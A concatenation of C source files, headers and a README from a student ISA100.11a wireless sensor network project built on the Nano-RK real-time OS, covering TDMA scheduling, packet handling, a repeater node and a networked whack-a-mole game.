uint16_t div;
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
rtl_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length;
uint8_t rssi,slot,oldMole,newMole=0,Rounds =0;
uint8_t pre_slot_detect = MOLE_INIT_STATUS;//used for recording previous slot status
uint8_t cur_slot_detect = MOLE_INIT_STATUS;//used for recording current slot status
uint8_t tmp = 0x01;
uint8_t mole_remove = 0;
uint8_t number_timeouts =0;
uint8_t number_moles = 0;
uint8_t user_limit_timeout = 0; //used for recording user's limited responding timeout
uint8_t *local_rx_buf;
uint16_t counter;
uint32_t Score = 0;
char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
counter=0;
nrk_led_set(RED_LED);
rtl_init (RTL_COORDINATOR);
rtl_set_schedule( RTL_TX, MY_TX_SLOT, 1 );
// rtl_set_schedule( RTL_RX, MOLE_1_RX, 1 );
// rtl_set_schedule( RTL_RX, MOLE_2_RX, 1 );
// rtl_set_schedule( RTL_RX, MOLE_3_RX, 1 );
rtl_set_schedule( RTL_RX, MOLE_4_RX, 1 );
// rtl_set_schedule( RTL_RX, MOLE_5_RX, 1 );
rtl_set_channel(MY_CHANNEL);
rtl_start();
rtl_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!rtl_ready()) nrk_wait_until_next_period();
// Get the signal for UART RX
uart_rx_signal=nrk_uart_rx_signal_get();
// Register task to wait on signal
nrk_signal_register(uart_rx_signal);
// This shows you how to wait until a key is pressed to start
nrk_kprintf( PSTR("Press any key to start\r\n" ));
do{
if(nrk_uart_data_ready(NRK_DEFAULT_UART))
c=getchar();
else nrk_event_wait(SIG(uart_rx_signal));
nrk_time_get(×tart);
} while(c==-1);
c = -1;
//generate the first mole
newMole = rand()%MAX_MOLES;
//at the very beginning, master has to wait for nodes finishing scheduling their slots
j=0;
while(rtl_rx_pkt_check()==0){
printf("Waiting for connection, time %d \r\n",j++);
sprintf( &tx_buf[PKT_DATA_START],"Master count is S and new mole is S and Round = S");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
rtl_rx_pkt_release();
rtl_wait_until_rx_or_tx();
}
//record the timeout for timing out
nrk_time_get(&timeout);
//initial timeout interval
user_limit_timeout = 5;
printf("\r\nGame starts!");
while(finished==0){
//begin the game round
while(Rounds<=ROUNDS){
if( rtl_tx_pkt_check(MY_TX_SLOT)!=0 ){
//printf( "Pending on slot %d\r\n",MY_TX_SLOT );
}
else {
//printf("\r\nslot detect value:%d.\r\n",cur_slot_detect);
nrk_time_get(&timeend);
//game round continues
if (Rounds<=ROUNDS){
if(timeend.secs-timeout.secs > user_limit_timeout/*ROUNDS/2-Rounds/2*/){
//a round times out (extra credit)
nrk_time_get(&timeout);
oldMole = newMole;
if(cur_slot_detect==0x00){
while(oldMole==newMole)
newMole = rand()%MAX_MOLES;
}else{
if(cur_slot_detect==0x01)
mole_remove = 0;
else if(cur_slot_detect==0x02)
mole_remove = 1;
else if(cur_slot_detect==0x04)
mole_remove = 2;
else if(cur_slot_detect==0x08)
mole_remove = 3;
else if(cur_slot_detect==0x10)
mole_remove = 4;
while(oldMole==newMole||mole_remove==newMole)
newMole = rand()%MAX_MOLES;
}
cur_slot_detect = MOLE_INIT_STATUS;
Rounds++;
Score -= 10;
//printf("\nRounds = %d \nnumber_timeouts = %d \npresent time = %d\n", Rounds, number_timeouts, timeout.secs-timestart.secs);
printf("\r\nRound %d times out! Get a penalty of 10! Score is %d",Rounds,Score);
}
}
// if(pre_slot_detect!=cur_slot_detect)
// cur_slot_detect = MOLE_INIT_STATUS;
pre_slot_detect = cur_slot_detect;
cur_slot_detect = MOLE_INIT_STATUS;
// added the next mole to light up into the buffer
sprintf( &tx_buf[PKT_DATA_START],"Master count is %d and new mole is %d and Round = %d",counter,newMole,Rounds);
// PKT_DATA_START + length of string + 1 for null at end of string
//if(Rounds>=ROUNDS){
// Rounds++;
// sprintf( &tx_buf[PKT_DATA_START],"Master count is %d and new mole is %d and Round = %d",counter,6,Rounds);
//}
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
//printf( "\nTX on slot %d\r\n",MY_TX_SLOT);
//for(i=PKT_DATA_START;i<length;i++)
//printf("%c",tx_buf[i]);
nrk_led_toggle(BLUE_LED);
//printf("\n\n");
}
// Check for received packet
if( rtl_rx_pkt_check()!=0 ){
tmp = 0x01;
uint8_t mole_index,state;
local_rx_buf=rtl_rx_pkt_get(&length, &rssi, &slot);
//printf( "RX slot %d %d: ",slot,length );
//To detect if the node is turned off
//printf("\n\rtmp:%d");
tmp <<= (slot-2)/2;
cur_slot_detect &= ~tmp;
//buffer position 11 stores the value of the moleid from the slaves
//buffer position 19 stores the value of light
// '1' indicates mole whacked (light closed)
// '0' indicates mole not whacked yet (light open)
if(((
local_rx_buf[11]-48) == newMole) &&
(local_rx_buf[19]=='1') &&
(Rounds <=ROUNDS)
){
//printf("NEW MOLE:%d",newMole);
oldMole = newMole;
if(pre_slot_detect==0x00){
while(oldMole==newMole)
newMole = rand()%MAX_MOLES;
}else{
if(pre_slot_detect==0x01)
mole_remove = 0;
else if(pre_slot_detect==0x2)
mole_remove = 1;
else if(pre_slot_detect==0x04)
mole_remove = 2;
else if(pre_slot_detect==0x08)
mole_remove = 3;
else if(pre_slot_detect==0x10)
mole_remove = 4;
while(oldMole==newMole||mole_remove==newMole)
newMole = rand()%MAX_MOLES;
}
Rounds++;
user_limit_timeout -= 1;
if(user_limit_timeout<1)
user_limit_timeout = 1;
nrk_time_get(&timeend);
nrk_time_get(&timeout);
Score += 100;//timeend.secs-timestart.secs; //+ number_timeouts * 10;
//number_timeouts = 0;
printf("\r\n You got it. Round: %d, Score : %d",Rounds, Score);
//cur_slot_detect = MOLE_INIT_STATUS;
}
//printf( "\r\n" );
rtl_rx_pkt_release();
}
rtl_wait_until_rx_or_tx();
}//while(Rounds<=ROUNDS)
printf("\r\nDONE and Score = %d \r\n",Score);
// This shows you how to continue this game or not
printf("\r\ncontinue this game or not? (y/n)\r\n");
// Get the signal for UART RX
uart_rx_signal=nrk_uart_rx_signal_get();
// Register task to wait on signal
nrk_signal_register(uart_rx_signal);
//c = -1;
do{
if(nrk_uart_data_ready(NRK_DEFAULT_UART))
c=getchar();
else nrk_event_wait(SIG(uart_rx_signal));
nrk_time_get(×tart);
} while(c==-1);
if(c=='y'||c=='Y'){
c = -1;
newMole = 0;
pre_slot_detect = MOLE_INIT_STATUS;//used for recording previous slot status
cur_slot_detect = MOLE_INIT_STATUS;//used for recording current slot status
tmp = 0x01;
mole_remove = 0;
number_timeouts =0;
number_moles = 0;
Score = 0;
Rounds = 0;
//at the very beginning, master has to wait for nodes finishing scheduling their slots
j=0;
rtl_rx_pkt_release();
while(rtl_rx_pkt_check()==0){
printf("Waiting for nodes scheduling their slots, time %d \r\n",j++);
sprintf( &tx_buf[PKT_DATA_START],"Master count is S and new mole is S and Round = S");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
rtl_rx_pkt_release();
rtl_wait_until_rx_or_tx();
}
}else if(c=='n'||c=='N'){
printf("Game ends");
nrk_terminate_task();
}
}//while(finished)
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 1;
TaskOne.period.nano_secs = 0;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 100*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/xmpp_pkt.h
#ifndef _XMPP_PKT_H
#define _XMPP_PKT_H
#include <sampl.h>
#define XMPP_PASSWD_START_OFFSET 5
#define XMPP_TIMEOUT_OFFSET 4
typedef struct xmpp_pkt
{
uint8_t passwd_size; // byte 0
uint8_t jid_size; // byte 1
uint8_t msg_size; // byte 2
uint8_t timeout; // byte 3
char *passwd; // byte 4
char *jid; // byte 4+passwd_size
char *msg; // byte 4+passwd_size+jid_size
} XMPP_PKT_T;
int8_t xmpp_generate( SAMPL_UPSTREAM_PKT_T *pkt,SAMPL_DOWNSTREAM_PKT_T *ds_pkt);
uint8_t xmpp_pkt_pack( XMPP_PKT_T *p, uint8_t *buf, uint8_t index );
void xmpp_pkt_unpack( XMPP_PKT_T *p, uint8_t *buf, uint8_t index );
#endif
<file_sep>/ISA100.11a-master/README.md
ISA100.11a
==========
To build and run:
1. Download the entire folder either by forking or snapshot.
2. Go to / ISA100_11a / code / current / nano-RK-well-sync / projects / final_project /
2. Choose between the gateway and repeater folders as required. For a single topology, there needs to be only one gateway.
3. To build, type "make;make clean;make program" in a terminal inside the gateway/repeater folder.
4. For each repeater, replace repeater/main.c by the file by the repeater ID you wish to use from Documentation/9 node config/.
5. To view the serial output, you may open a minicom window for each device connected.
Files: Project Report: ESE 519 ISA Final Report.pdf
API, Vidoes: https://github.com/ESE519/ISA100.11a/wiki
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/src/isa_backup/isa_scheduler.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
#include <isa.h>
#include <isa_scheduler.h>
#include <include.h>
#include <nrk_error.h>
/* For ISA */
/* This method is only for demo 1. Need to be updated!! */
int8_t isa_set_schedule (isa_node_mode_t isa_node_mode, uint8_t clk_src_id)
{
char i =0;
isa_clk_src_id = clk_src_id;
if (isa_node_mode==ISA_REPEATER){
isa_tdma_rx_mask |= ((uint32_t) 1) << 5;
isa_tdma_rx_mask |= ((uint32_t) 1) << 3;
isa_tdma_tx_mask |= ((uint32_t) 1) << 2;
isa_sched[2] = 1;
isa_sched[3] = 1;
isa_sched[5] = 1;
}
else if(isa_node_mode==ISA_RECIPIENT){
//isa_tdma_rx_mask = 0xffff;
isa_tdma_rx_mask |= ((uint32_t) 1) << 2;
isa_tdma_tx_mask |= ((uint32_t) 1) << 5;
//for(i=0;i<25;i++)
isa_sched[2] = 1;
isa_sched[5] = 1;
}
/*printf("isa_scheduler.h, isa_set_schedule():\n\r");
for(i=0;i<25;i++)
printf("%d,",isa_sched[i]);
printf("\n\r");*/
return NRK_OK;
}
/**
* isa_get_schedule()
*
* This function returns the stored schedule for a particular slot.
*
* Return: schedule value
*/
int8_t isa_get_schedule (uint8_t slot)
{
if (slot > ISA_SLOTS_PER_FRAME)
return NRK_ERROR;
return isa_sched[slot];
}
/**
* _isa_clear_sched_cache()
*
* This function is called by the timer interrupt at the
* start of each ISA cycle to remove any cached scheduling
* values. Only call this if you are reseting the ISA frames.
*/
void _isa_clear_sched_cache ()
{
uint8_t i;
// FIXME compress this shit later...
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
}
/**
* isa_get_slots_until_next_wakeup()
*
* This function returns the absolute number of slots between the current_slot
* and the next RX/TX related wakeup. It uses an internal cache to allow for
* faster computation.
*
* Argument: current_slot is the current slot
* Return: uint16_t number of slots until the next wakeup
*/
uint16_t isa_get_slots_until_next_wakeup (uint16_t current_global_slot)
{
uint16_t min_slot;
uint8_t test_slot;
uint8_t wrapped_slot;
uint8_t current_local_slot;
//total_slot = (((uint16_t)current_frame)<<5) + current_slot;
min_slot = ISA_SLOTS_PER_FRAME + 1;
current_local_slot = current_global_slot%25;
//scheduled slot follows current slot
for (test_slot = current_local_slot+1; test_slot < ISA_SLOTS_PER_FRAME; test_slot++) {
//printf("isa_sched[%d] is %d.\n\r",test_slot,isa_sched[test_slot]);
if(isa_sched[test_slot]==0) //slot is not scheduled
continue;
min_slot = test_slot-current_local_slot;
return min_slot;
}
// scheduled slot wrapped back
for (test_slot = 0; test_slot<=current_local_slot;test_slot++){
if(isa_sched[test_slot]==0) //slot is not scheduled
continue;
min_slot = (ISA_SLOTS_PER_FRAME - current_local_slot + test_slot);
return min_slot;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/SAMPL/client_core/generate.c
#include "generate.h"
#include <globals.h>
#include <nrk.h>
#include <bmac.h>
#include <sampl.h>
#include <ping_pkt.h>
#include <eeprom_data.h>
#include <ack_pkt.h>
#include <control_pkt.h>
#include <trace.h>
#include <stats_pkt.h>
#include <transducer_pkt.h>
/*
uint8_t upstream_reply_mac
This is the address of the node higher in the tree that sent
the packet. Typically this should be used as the destination
reply address.
*/
void create_upstream_data_packet (SAMPL_DOWNSTREAM_PKT_T * ds_pkt,
SAMPL_UPSTREAM_PKT_T * us_pkt,
uint8_t upstream_reply_mac)
{
uint8_t len,i,mode,num;
uint16_t addr;
// This function is responsible for creating the
// data that is sent back up the tree.
#ifdef DEBUG_TXT
nrk_kprintf (PSTR ("Composing reply\r\n"));
#endif
us_pkt->seq_num = ds_pkt->seq_num;
us_pkt->next_hop_dst_mac = upstream_reply_mac;
us_pkt->buf_len=US_PAYLOAD_START;
us_pkt->payload=&(us_pkt->buf[US_PAYLOAD_START]);
us_pkt->payload_len=0;
us_pkt->payload_start=US_PAYLOAD_START;
us_pkt->ctrl_flags = US_MASK;
if((ds_pkt->ctrl_flags & LINK_ACK) !=0 ) us_pkt->ctrl_flags |= LINK_ACK;
if((ds_pkt->ctrl_flags & ENCRYPT) !=0 ) us_pkt->ctrl_flags |= ENCRYPT;
us_pkt->ack_retry= ds_pkt->ack_retry;
us_pkt->subnet_mac[0] = my_subnet_mac[0];
us_pkt->subnet_mac[1] = my_subnet_mac[1];
us_pkt->subnet_mac[2] = my_subnet_mac[2];
us_pkt->priority = ds_pkt->priority;
us_pkt->error_code = 0;
us_pkt->num_msgs = 1;
if(admin_debug_flag==1 && (ds_pkt->ctrl_flags & DEBUG_FLAG) !=0 )
{
printf( "0x%x%x: ",my_subnet_mac[0],my_mac);
nrk_kprintf( PSTR(" ds_pkt ") );
if(ds_pkt->is_mac_selected==1)
nrk_kprintf( PSTR("selected\r\n") );
else
nrk_kprintf( PSTR("not selected\r\n") );
}
if(ds_pkt->is_mac_selected==1)
{
us_pkt->pkt_type = ds_pkt->pkt_type;
switch (ds_pkt->pkt_type) {
case PING_PKT:
ping_generate(us_pkt);
break;
case XMPP_PKT:
// just forward and send acks back
// mobile nodes will interperate the packets
xmpp_generate(us_pkt,ds_pkt);
break;
case CONTROL_PKT:
// Don't reply if packet is not encrypted
if((ds_pkt->ctrl_flags & ENCRYPT) == 0 ) return;
control_generate(us_pkt,ds_pkt);
break;
case STATS_PKT:
stats_generate(us_pkt,ds_pkt);
break;
case SUBNET_NEIGHBOR_LIST_PKT:
nlist_generate(us_pkt,ds_pkt);
break;
case TRACEROUTE_PKT:
trace_generate(us_pkt,ds_pkt);
break;
case ROUTE_PKT:
// Don't reply if packet is not encrypted
if((ds_pkt->ctrl_flags & ENCRYPT) == 0 ) return;
route_generate(us_pkt,ds_pkt);
break;
case DATA_STORAGE_PKT:
eeprom_storage_generate(us_pkt, ds_pkt);
break;
case TRANSDUCER_CMD_PKT:
transducer_generate(us_pkt, ds_pkt);
break;
default:
if(admin_debug_flag==1 && (ds_pkt->ctrl_flags & DEBUG_FLAG) !=0 )
{
printf ("Unknown %d, %d: ", ds_pkt->pkt_type, ds_pkt->payload_len);
for(i=0; i<ds_pkt->payload_len; i++ )
printf( "%x ",ds_pkt->payload[i] );
printf( "\r\n" );
}
us_pkt->pkt_type = EMPTY_PKT;
us_pkt->num_msgs = 0;
}
}
else
{
// Fill in blank reply
us_pkt->pkt_type = EMPTY_PKT;
us_pkt->num_msgs = 0;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/dlmo.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef DLMO_H
#define DLMO_H
//********************************Configure max limits**********************************
#define DLMO_LINK_MAX_COUNT 10
#define DLMO_NEIGHBOR_MAX_COUNT 25
#define TRANSMIT_QUEUE_MAX_SIZE 10
//****************************************************************************************
#define ISA_SLOTS_PER_FRAME 25
#define ISA_MAX_SLOTS 63
//************************linkType field in DLMO_LINK******************************
#define TRANSMIT_BIT 0x80
#define RECEIVE_BIT 0x40
#define EXP_BACK_BIT 0x20
#define IDLE_BIT 0x10
#define DISCOVERY 0x0C
#define JOIN_RESPONSE 0x02
#define SELECTIVE 0x01
//Discovery
#define DISCOVERY_NONE 0
#define DISCOVERY_ADVERTISEMENT 1
#define DISCOVERY_BURST 2
#define DISCOVERY_SOLICITATION 3
//SELECTIVE
#define SELECTIVE_ALLOWED 1
#define SELECTIVE_NOT_ALLOWED 0
//enums for linkType
typedef enum {
JOIN_RESP,
TX_NO_ADV,
TX_RX_NO_ADV,
TX_ADV,
ADV,
BURST_ADV,
BURST_ADV_SCAN,
SOLICITATION,
RX
} LinkType;
//***********************************************************************************
/* For isa link*/
typedef enum{
DHDR_INDEX=0,
DHR_INDEX=0,
DMXHR_INDEX=1,
DAUX_INDEX=5,
DROUT_INDEX=34,
DADDR_INDEX=37,
//SLOT_INDEX=6,
SLOT_INDEX=1,
SRC_INDEX=2,//change
OFFSET_HIGH=1,
OFFSET_LOW=2,
PKT_DATA_START=3
//PKT_DATA_START=42
} isa_pkt_field_t;
//**********************************************ISA_QUEUE***************************************************
typedef struct ISA_QUEUE ISA_QUEUE;
struct ISA_QUEUE
{
int8_t length;
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
bool transmitPending;
bool usedSlot;
void (*slot_callback)(ISA_QUEUE *);
uint8_t priority;
uint16_t neighbor;
nrk_time_t time;
} ;
//************************************dlmo.neighbor structure***************************************
//for typeInfo
# define CLOCK_NONE 0x00
# define CLOCK_SECONDARY 0x40
# define CLOCK_PREFERRED 0x80
# define CLOCK_RESERVED 0xC0
typedef struct {
bool isPresent;
uint16_t index;
uint64_t EUI64;
uint8_t groupCode1;
uint8_t groupCode2;
uint8_t typeInfo;// 7-6 ClockSource, 5-4 ExtGrCnt, DiagLevel 3-2, LinkBacklog 1,Reserved 0
uint8_t linkBacklogIndex;//
uint8_t linkBacklogDur;//
uint8_t linkBacklogActivate;
}DLMO_NEIGHBOR;
//MACROS for bit manipulation
#define BITSET(x,y) ((x) |= 1<<(y))
#define BITCLEAR(x,y) ((x) &= 1<<(y))
#define BITGET(x,y) ((x) & 1<<(y))
#define ISAMASK(x,y) ((x) & (y))
#define ISASET(x,y) ((x) | (y))
// ********************************* dlmo.link structure *******************************
typedef struct {
bool isPresent;
uint16_t index;
uint8_t superframeIndex;
uint8_t linkType;
uint8_t template1;
uint8_t template2;
uint8_t typeInfo;
DLMO_NEIGHBOR *neighbor; //pointer to the neighbor that this link is configured for
uint16_t graphId;
uint32_t schedule;
uint8_t chOffset;
uint8_t priority;
} DLMO_LINK;
//************************************extern functions**************************************
extern void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource);
extern void dlmoInit();
extern int8_t addLink (uint8_t slotNumber, DLMO_NEIGHBOR* neighborIndex,LinkType linkType);
extern DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
extern void sendPacket(uint16_t destAddr, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry)) ;
extern DLMO_LINK * findLink(uint8_t slot);
extern void isaFreePacket(ISA_QUEUE *entry);
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/final_project/repeater/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
//#include <sys/time.h>
#define MY_CHANNEL 19
#define MY_ID 2 //change
//#define MY_TX_SLOT_SYNC 2
//#define MY_RX_SLOT 17
#define MY_RX_SLOT 2
#define MY_TX_SLOT 3
#define MY_CLK_SRC_ID 0
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
//uint8_t tx_buf2[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot;
uint8_t *local_rx_buf;
uint32_t Score = 0;
int8_t rssi;
uint8_t cnt=0;
//uint8_t tx[3]={2,15,16};
//uint8_t rx[3]={3,18,19};
//uint8_t my_tx_slot[4];
char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
isa_set_channel_pattern(1);
isa_init (ISA_REPEATER, MY_ID, MY_ID);//change
isa_set_schedule(ISA_REPEATER, MY_CLK_SRC_ID);
isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
/*while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);*/
printf("isa start!\n\r");
//i=0;
while(1){
//nrk_gpio_toggle(NRK_DEBUG_0);
if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("length is %d, rssi is %d.\n\r",length,rssi);
//local_rx_buf[PKT_DATA_START+length-2]='\0';
//printf("RX[%d]",slot);
/*for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%c",local_rx_buf[i]);*/
//printf("\r\n");
//sprintf( &tx_buf[PKT_DATA_START],"Hello Mingzhe!");
//length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
//isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
/*
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
isa_tx_pkt(rx_buf,length,configDHDR(),MY_TX_SLOT1);//change forward the message from recipient
*/
//printf(" Forward message is sent.\n\r");
//printf("pkt length:%d",length);
//printf("%d\r\n",cnt++);
// printf( "%c",local_rx_buf[PKT_DATA_START]);
isa_rx_pkt_release();
// printf("\r\n");
}
/*sprintf( &tx_buf[PKT_DATA_START],local_rx_buf+PKT_DATA_START);
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
//isa_tx_pkt(rx_buf,length,configDHDR(),my_tx_slot[0]);//change forward the message from recipient
isa_tx_pkt(rx_buf,length,configDHDR(),MY_TX_SLOT);
isa_wait_until_rx_or_tx ();*/
sprintf( &tx_buf[PKT_DATA_START],"2");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
isa_wait_until_rx_or_tx ();
putchar('\n');
putchar('\r');
/*sprintf( &tx_buf2[PKT_DATA_START],"Hello from slot 2!");
length=strlen(&tx_buf2[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf2,length,configDHDR(),2);
isa_wait_until_rx_or_tx ();*/
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 20*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 20*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 50*NANOS_PER_MS;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/client_core/sampl_tasks.h
#ifndef _SAMPL_TASKS_H_
#define _SAMPL_TASKS_H_
void sampl_config();
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/dlmo.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef DLMO_H
#define DLMO_H
//********************************Configure max limits**********************************
#define DLMO_LINK_MAX_COUNT 20
#define DLMO_GRAPH_MAX_COUNT 10
#define DLMO_NEIGHBOR_MAX_COUNT 16
#define TRANSMIT_QUEUE_MAX_SIZE 20
#define DLMO_CANDIDATE_MAX_SIZE 20
#define MAX_RETRIES 3 //the number working of neighbors in graph should be checked if this changes
//****************************************************************************************
#define ISA_SLOTS_PER_FRAME 50
#define ISA_MAX_SLOTS 63
//************************linkType field in DLMO_LINK******************************
#define TRANSMIT_BIT 0x80
#define RECEIVE_BIT 0x40
#define EXP_BACK_BIT 0x20
#define IDLE_BIT 0x10
#define DISCOVERY 0x0C
#define JOIN_RESPONSE 0x02
#define SELECTIVE 0x01
//Discovery
#define DISCOVERY_NONE 0
#define DISCOVERY_ADVERTISEMENT 1
#define DISCOVERY_BURST 2
#define DISCOVERY_SOLICITATION 3
//SELECTIVE
#define SELECTIVE_ALLOWED 1
#define SELECTIVE_NOT_ALLOWED 0
//enums for linkType
typedef enum {
JOIN_RESP,
TX_NO_ADV,
TX_RX_NO_ADV,
TX_ADV,
ADV,
BURST_ADV,
BURST_ADV_SCAN,
SOLICITATION,
RX
} LinkType;
//***********************************************************************************
typedef enum{
FAILURE,
SUCCESS
} status;
//***********************************************************************************
/* For isa link*/
typedef enum{
DHDR_INDEX=0,
DHR_INDEX=0,
DMXHR_INDEX=1,
DAUX_INDEX=5,
DROUT_INDEX=4, //compressed variant is 3 bytes
DADDR_INDEX=37,
//SLOT_INDEX=6,
SLOT_INDEX=1,
SRC_INDEX=2,//change
DEST_INDEX = 3,
OFFSET_HIGH=1,
OFFSET_LOW=2,
PKT_DATA_START= 7
//PKT_DATA_START=42
} isa_pkt_field_t;
//**********************************************ISA_QUEUE***************************************************
typedef struct ISA_QUEUE ISA_QUEUE;
struct ISA_QUEUE
{
